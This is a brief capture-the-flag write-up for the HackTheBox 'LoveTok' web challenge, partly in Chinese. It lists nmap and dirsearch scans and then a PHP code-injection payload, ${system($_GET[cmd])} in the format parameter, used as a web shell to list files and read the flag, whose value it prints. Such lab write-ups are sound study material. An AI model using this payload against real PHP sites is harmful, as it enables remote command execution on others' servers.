HackTheBox: LoveTok

Table of Contents

[TOC]

Topic

Lab

HackTheBox:

https://app.hackthebox.com/challenges/198

Initial Enumeration

●Start Machine: http://206.189.28.180:30492/

Solution

1. Attempt

1.1 nmap scan

nmap -sC -sV -T4 206.189.28.180

這題非滲透，只開 port 30492

1.2 dirsearch scan

dirsearch -u http://206.189.28.180:30492/

/.DS_Store

●.DS_Store用途

1.3 Browse

1.3.1 Click on the button, url changes

http://206.189.28.180:30492/?format=r

1.3.2 Edit url

http://206.189.28.180:30492/?format=chw

(Text Changed)

2023-10-16T22:24:07+00:00101

2. Web shell

2.1 system() function

●Web Shell: https://www.imperva.com/learn/application-security/web-shell/
●HackTricks: PHP Code Execution

(restart machine, IP 有變更)

http://142.93.32.153:30198/?format=${system($_GET[cmd])}&cmd=ls

2.2 Check download file

2.2.1 idex.php 位在LoveTok\web_lovetok\challenge

2.2.2 Find Flag location

\LoveTok\web_lovetok

2.3 Find Flag during Web shell

TEST : http://142.93.32.153:30198/?format=${phpinfo()}

http://142.93.32.153:30198/?format=${system($_GET[cmd])}&cmd=ls+../ (URL encode: 空白='+')

3. Find Flag

http://142.93.32.153:30198/?format=${system($_GET[cmd])}&cmd=cat+../flagNBD9R

FLAG: HTB{wh3n_l0v3_g3ts_eval3d_sh3lls_st4rt_p0pp1ng}

tags: Web CTF Webshell